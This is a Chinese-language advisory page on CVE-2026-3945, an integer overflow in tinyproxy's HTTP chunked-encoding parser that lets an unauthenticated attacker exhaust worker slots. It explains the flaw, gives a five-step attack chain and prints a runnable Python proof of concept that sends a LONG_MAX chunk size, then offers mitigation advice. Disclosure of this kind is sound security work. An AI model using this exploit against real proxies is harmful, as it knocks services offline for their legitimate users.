CVE-2026-3945 CVSS 7.5 高危

CVE-2026-3945 tinyproxy HTTP分块传输编码整数溢出漏洞

披露日期: 2026-03-30

来源: 309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c

漏洞信息

漏洞编号

CVE-2026-3945

漏洞类型

整数溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

tinyproxy

漏洞概述

tinyproxy 1.11.3及之前版本中存在整数溢出漏洞。攻击者可利用HTTP分块传输编码解析器的缺陷，通过构造特殊的分块大小值绕过验证，导致解析错误。这会使代理服务尝试读取极大的数据量并耗尽工作线程，最终导致服务拒绝响应。

技术细节

该漏洞源于tinyproxy在处理HTTP分块传输编码时，使用strtol()函数解析分块大小，但未正确检查errno以验证溢出条件。尽管代码中存在 `chunklen < 0` 的校验逻辑，攻击者仍可发送如 `0x7fffffffffffffff` (即LONG_MAX) 的特殊分块大小值。在后续执行 `chunklen + 2` 等算术运算时，会发生有符号整数溢出，导致计算出的长度值异常（如变为负数），从而绕过现有的长度限制检查。此时，代理服务会误判并尝试读取极其巨大的请求体数据，导致工作连接被无限期挂起。攻击者无需身份认证即可远程利用此漏洞，通过发送恶意HTTP请求，可迅速耗尽服务器所有可用的worker槽位，致使tinyproxy进程无法处理新的连接请求，最终导致服务完全不可用，造成严重的拒绝服务风险。

攻击链分析

STEP 1

信息收集

攻击者识别出目标网络中运行着tinyproxy服务（版本 <= 1.11.3）。

STEP 2

构造恶意请求

攻击者构造特制的HTTP请求，设置Transfer-Encoding为chunked，并将chunk size设置为0x7fffffffffffffff。

STEP 3

触发漏洞

服务器解析该分块大小时，strtol()返回LONG_MAX，随后的(chunklen + 2)运算导致整数溢出，绕过长度校验。

STEP 4

耗尽资源

tinyproxy尝试读取超大数据，Worker连接被挂起。攻击者重复此过程耗尽所有Worker槽位。

STEP 5

拒绝服务

所有可用连接被占用，合法用户无法建立新连接，导致代理服务完全不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import sys

# Target configuration
target_host = "127.0.0.1"
target_port = 8888

# Malicious chunk size: LONG_MAX causing integer overflow
# 0x7fffffffffffffff = 9223372036854775807
payload = "9223372036854775807\r\n"

def send_exploit():
    try:
        # Connect to the tinyproxy server
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_host, target_port))
        
        # Send HTTP request with crafted chunked encoding
        request = (
            "GET / HTTP/1.1\r\n"
            "Host: {}\r\n"
            "Transfer-Encoding: chunked\r\n"
            "\r\n"
            "{}".format(target_host, payload)
        )
        
        s.send(request.encode())
        print("[+] Malicious payload sent. Connection should hang.")
        # Keep connection open to exhaust worker slot
        while True:
            pass
            
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        s.close()

if __name__ == "__main__":
    send_exploit()

影响范围

tinyproxy <= 1.11.3

防御指南

临时缓解措施

建议配置防火墙规则，限制仅允许受信任的IP地址访问tinyproxy代理服务。同时，实施入侵检测系统（IDS）监控异常的HTTP分块传输请求。在未升级前，可考虑限制单个IP的最大并发连接数，以缓解DoS攻击的影响。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表